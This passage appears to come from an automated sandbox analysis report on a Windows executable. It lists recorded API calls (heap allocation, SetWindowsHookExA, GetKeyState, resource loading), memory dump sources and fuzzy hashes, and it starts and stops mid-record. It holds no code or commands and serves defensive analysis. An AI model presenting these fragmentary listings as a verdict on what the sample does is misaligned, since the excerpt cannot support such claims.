                                                                                • SetErrorMode.KERNELBASE(00000000,00000000,0042F3D3,00000000,00000000,00000000,00000000,?,00000000,?,0042A17C,00000000,00000000,00000000,00000000,00422D2F), ref: 00431F74
                                                                                • SetErrorMode.KERNELBASE(00000000,?,00000000,?,0042A17C,00000000,00000000,00000000,00000000,00422D2F,00000000), ref: 00431F7B
                                                                                  • Part of subcall function 00431FCE: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00431FFF
                                                                                  • Part of subcall function 00431FCE: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004320A0
                                                                                  • Part of subcall function 00431FCE: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004320CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                                                                • String ID: /-B
                                                                                • API String ID: 3389432936-1957208732
                                                                                • Opcode ID: f3774d976a97f6d6f72b9af28574488b6dd9fc69cfbb038d953151dcdadd1df3
                                                                                • Instruction ID: b4d34eb12584c0c1ac635ce6794e2eb14ac52cb859aef63498e59811a40faf8f
                                                                                • Opcode Fuzzy Hash: f3774d976a97f6d6f72b9af28574488b6dd9fc69cfbb038d953151dcdadd1df3
                                                                                • Instruction Fuzzy Hash: E7F03770A043159FDB14EF25D444A597BE4AF4C714F05849FF4449B3A2CBB8D840CB9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,00425348,00000000,?,?,?,00422CBF), ref: 004255A8
                                                                                • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00425348,00000000,?,?,?,00422CBF), ref: 004255DC
                                                                                • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00422CBF), ref: 004255F6
                                                                                • HeapFree.KERNEL32(00000000,?,?,00422CBF), ref: 0042560D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocHeap$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 3499195154-0
                                                                                • Opcode ID: cb68290ed235b5314457fb0e0a70ffc64d46e1a0a14e52f606e87720b15228c7
                                                                                • Instruction ID: a908bdb736778bf31c73eff07cacc3cd2293120c19c21996882aa932680f4d10
                                                                                • Opcode Fuzzy Hash: cb68290ed235b5314457fb0e0a70ffc64d46e1a0a14e52f606e87720b15228c7
                                                                                • Instruction Fuzzy Hash: E7116A34200701AFD7228F1AEC49D227BB6FB86715750492AF562C72B6C7709946CF08
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,00000008,00001000), ref: 00436742
                                                                                • RtlAllocateHeap.NTDLL(?,00000008,?), ref: 004367C8
                                                                                • RtlAllocateHeap.NTDLL(?,00000008,?), ref: 004367DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 9f3e9e6c98b4ca4221b31826def544a6d5a4dc9f843c6857c8ea1e7f7bf5d80a
                                                                                • Instruction ID: 4a6c4b383bf5617ad2b06fc23ccaac188523056a1ad6c0ced365b9f51692f34b
                                                                                • Opcode Fuzzy Hash: 9f3e9e6c98b4ca4221b31826def544a6d5a4dc9f843c6857c8ea1e7f7bf5d80a
                                                                                • Instruction Fuzzy Hash: CF51D7B5A00109EFDB04DF98C981EAEB7B5FF8C304F108159FA19AB340D675AE51CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0042E19D
                                                                                • SetWindowsHookExA.USER32 ref: 0042E1AD
                                                                                  • Part of subcall function 004319D1: __EH_prolog.LIBCMT ref: 004319D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CurrentH_prologHookThreadWindows
                                                                                • String ID:
                                                                                • API String ID: 2183259885-0
                                                                                • Opcode ID: 58fc138f468f26690cf3766432794366a105577579f07f228e96f2021765464d
                                                                                • Instruction ID: 1955eefbcbf9e5b194b6998f6f80fde03342ae0f126eec52e6188af84e5dcaef
                                                                                • Opcode Fuzzy Hash: 58fc138f468f26690cf3766432794366a105577579f07f228e96f2021765464d
                                                                                • Instruction Fuzzy Hash: 68F0E571A403246BEB203B76A81DB2A36909F0C715F04277FB2125A1F1CBBC9D40C35D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000,00422CAD,00000001), ref: 00424A9E
                                                                                  • Part of subcall function 00424EE3: HeapAlloc.KERNEL32(00000000,00000140,00424AB2), ref: 00424EF0
                                                                                • HeapDestroy.KERNEL32 ref: 00424ABC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Heap$AllocCreateDestroy
                                                                                • String ID:
                                                                                • API String ID: 2236781399-0
                                                                                • Opcode ID: 8c531ebd8d66de8f06d495695eabd25766e436e4be11602a9b93f7e0e09ee136
                                                                                • Instruction ID: 7b4b601f46d6c8ba65f5d70c82751cbcbc83a8b9a5515441242a43bb0635cdcd
                                                                                • Opcode Fuzzy Hash: 8c531ebd8d66de8f06d495695eabd25766e436e4be11602a9b93f7e0e09ee136
                                                                                • Instruction Fuzzy Hash: 30E01775750310AAFB519F32EC497663AE8EB84B93F44843AF905C91A8EBA5C6809618
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00425357,000000E0,00000000,?,?,?,00422CBF), ref: 00425682
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 34d74479530f89d5faee0a5a77d84001e336a1c68622be370c1bca483279c98b
                                                                                • Instruction ID: 91d80ac239c5404b2af084a63e45f6193e1148c271a930ac4fc648c2146b1e5a
                                                                                • Opcode Fuzzy Hash: 34d74479530f89d5faee0a5a77d84001e336a1c68622be370c1bca483279c98b
                                                                                • Instruction Fuzzy Hash: 2E31CC316006028FD314CF08D884BA5BBE0FF50368F68C2BEE5198B3A2D774E946CB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • HeapAlloc.KERNEL32(00000008,?,?,?,?,0042402B,00000001,00000074,?,00422CBF), ref: 00425BF0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                • Opcode ID: 841efbef0d6d3901838fc0c62af2fd2a5a2b81fac177f2872f295aea61983c0b
                                                                                • Instruction ID: bbb579d3fd96b107eec2e1de9fc55587986ea50d9c46ac7c70ffe5598a45c14a
                                                                                • Opcode Fuzzy Hash: 841efbef0d6d3901838fc0c62af2fd2a5a2b81fac177f2872f295aea61983c0b
                                                                                • Instruction Fuzzy Hash: 62016D36701E3017D51226267D81B1B2604ABC1761F890127FD50673D1EA789C40469D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 00427F75
                                                                                • CallWindowProcA.USER32 ref: 00427F97
                                                                                  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Prop$CallProcRemoveWindow
                                                                                • String ID: #32770
                                                                                • API String ID: 2276450057-463685578
                                                                                • Opcode ID: 6567103ddafd75f8ceb98557b9f084fd5652458aea2f20f0641e91bb2f46b417
                                                                                • Instruction ID: 8c9e5920a8a67ed9e748230e76886abd2d9da6cbde0234df147e64817261dc27
                                                                                • Opcode Fuzzy Hash: 6567103ddafd75f8ceb98557b9f084fd5652458aea2f20f0641e91bb2f46b417
                                                                                • Instruction Fuzzy Hash: 8B813C317063247BE210AB11FC45FAF775CEB867A6F81042FFE0183241DB299955C6BA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CallWindowProcA.USER32 ref: 004277BA
                                                                                • DefWindowProcA.USER32(00000000,?,?,?), ref: 004277CD
                                                                                • IsIconic.USER32 ref: 004277EF
                                                                                • SendMessageA.USER32 ref: 0042781C
                                                                                • GetWindowLongA.USER32 ref: 0042782B
                                                                                • GetWindowDC.USER32(00000000), ref: 0042786C
                                                                                • GetWindowRect.USER32 ref: 0042787A
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004278BD
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004278E0
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004278EE
                                                                                • OffsetRect.USER32 ref: 00427944
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
                                                                                • String ID:
                                                                                • API String ID: 2215177122-0
                                                                                • Opcode ID: 04f13491f957867a3ca7f3f6b56eb918565e3e6b092b22a08df0977f52fa5e5b
                                                                                • Instruction ID: dfdc2a7e1658b55bc6f3650a701fb5984b333840fc68374b527215c78967b465
                                                                                • Opcode Fuzzy Hash: 04f13491f957867a3ca7f3f6b56eb918565e3e6b092b22a08df0977f52fa5e5b
                                                                                • Instruction Fuzzy Hash: 41819C75608300AFD300CF68DC85E6BB7E4FB89319F408A2DF94887291D775EA05CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00424D09,?,Microsoft Visual C++ Runtime Library,00012010,?,004415CC,?,0044161C,?,?,?,Runtime Error!Program: ), ref: 0042637B
                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00426393
                                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004263A4
                                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004263B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                • API String ID: 2238633743-4044615076
                                                                                • Opcode ID: 95e86af605773cd48e4174775bea8f941480e2610b63e4ab568ffa82ccc264fc
                                                                                • Instruction ID: 5e812ea6a7feffb595f194cdb7d890e8134cc3a50fbddf809906a6b1a8c86834
                                                                                • Opcode Fuzzy Hash: 95e86af605773cd48e4174775bea8f941480e2610b63e4ab568ffa82ccc264fc
                                                                                • Instruction Fuzzy Hash: 35017175340321AFD710DFB6ACC0A6B3AECBA59751315047BE900C2271DBB8C840CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,?,00000002), ref: 00429FE3
                                                                                • SizeofResource.KERNEL32(?,00000000,?,73FD2D10,00000000,73FD17C0,?,?,?,?,?,?,?,?,00427C21,00000001), ref: 00429FFD
                                                                                • LoadResource.KERNEL32(?,00000000,?,73FD2D10,00000000,73FD17C0,?,?,?,?,?,?,?,?,00427C21,00000001), ref: 0042A007
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadSizeof
                                                                                • String ID:
                                                                                • API String ID: 507330600-0
                                                                                • Opcode ID: 8bab794a205b5453a26984dc127781f11760d456e8a69ff356ad02a631c6113c
                                                                                • Instruction ID: a7c23153afd0a064990b4b067bbf81c5deb415718921ed192bc1ae2d90173566
                                                                                • Opcode Fuzzy Hash: 8bab794a205b5453a26984dc127781f11760d456e8a69ff356ad02a631c6113c
                                                                                • Instruction Fuzzy Hash: B541FD323042105BE70CCE29A856AAF77D2EBC9351F048A3EF946C3381DFB58909C3A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0042D8A8: GetWindowLongA.USER32 ref: 0042D8B4
                                                                                • GetKeyState.USER32(00000010), ref: 0042CCFE
                                                                                • GetKeyState.USER32(00000011), ref: 0042CD07
                                                                                • GetKeyState.USER32(00000012), ref: 0042CD10
                                                                                • SendMessageA.USER32 ref: 0042CD26
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: State$LongMessageSendWindow
                                                                                • String ID:
                                                                                • API String ID: 1063413437-0
                                                                                • Opcode ID: 39f3a8292884866b0136ab7819e78f3620a8e5951e08313c28e82afd734122b5
                                                                                • Instruction ID: 7867d4aebb8446bb121516b1bc0384815800b265f1f1e5fbe955967136b801bb
                                                                                • Opcode Fuzzy Hash: 39f3a8292884866b0136ab7819e78f3620a8e5951e08313c28e82afd734122b5
                                                                                • Instruction Fuzzy Hash: 00F0E27274036625E92036953CC2F9E86144F50F95FC0083BBB00AB1D1C99D88020AF8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 87f92d669cfe0f0c4725d900969239a60b6100f6613200dc66065f134221cb4c
                                                                                • Instruction ID: c04ec5e69cb9bfec964118c071885eacb722eba8d14d52d707a08c5a68c96e76
                                                                                • Opcode Fuzzy Hash: 87f92d669cfe0f0c4725d900969239a60b6100f6613200dc66065f134221cb4c
                                                                                • Instruction Fuzzy Hash: 4FF03C3570111DAADF01AF61EC04AAE3BB9AF20345F84C027FC1695171DB38CA55DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,?,000000F0), ref: 0042D1B3
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,?,0042ACDD,?,?,0040109A), ref: 0042D1BF
                                                                                • LockResource.KERNEL32(00000000,?,?,?,0042ACDD,?,?,0040109A), ref: 0042D1CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLock
                                                                                • String ID:
                                                                                • API String ID: 2752051264-0
                                                                                • Opcode ID: 482a25458762e2edea2817c7c68e005cbdb8bb3a8fe823c035c25d2d577ffbb0
                                                                                • Instruction ID: 4bc090be9f026aa9fd5f9b04e0483d8cfc6de5fa6684b686bd51774235a3835f
                                                                                • Opcode Fuzzy Hash: 482a25458762e2edea2817c7c68e005cbdb8bb3a8fe823c035c25d2d577ffbb0
                                                                                • Instruction Fuzzy Hash: 53E06D32B00126AB8B115F616C4987FB66EAFC53A2B54483BF902D2911CB688D2196B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetKeyState.USER32(00000010), ref: 0042E55E
                                                                                • GetKeyState.USER32(00000011), ref: 0042E567
                                                                                • GetKeyState.USER32(00000012), ref: 0042E570
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: State
                                                                                • String ID:
                                                                                • API String ID: 1649606143-0
                                                                                • Opcode ID: 206560a21e7653420da39caafce20ed01bc2e8c922614f8c83646a4c0d6d9dc4
                                                                                • Instruction ID: 38880fd6572229099b1e0dfb461247ceb66d1c89e36862a43f59f33f8cb6e260
                                                                                • Opcode Fuzzy Hash: 206560a21e7653420da39caafce20ed01bc2e8c922614f8c83646a4c0d6d9dc4
                                                                                • Instruction Fuzzy Hash: 82E0EC34F20265BDFA0052D6A800FD22A505B0C7D8F8084D7E7405B0A1D6A8C5D28F6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0042C068
                                                                                • GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 0042C21B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: H_prologVersion
                                                                                • String ID:
                                                                                • API String ID: 1836448879-0
                                                                                • Opcode ID: 1e7bd92853b28cd1a8fdc541d7300b93a6b6b50eb318f4510f7bc62ddeef206c
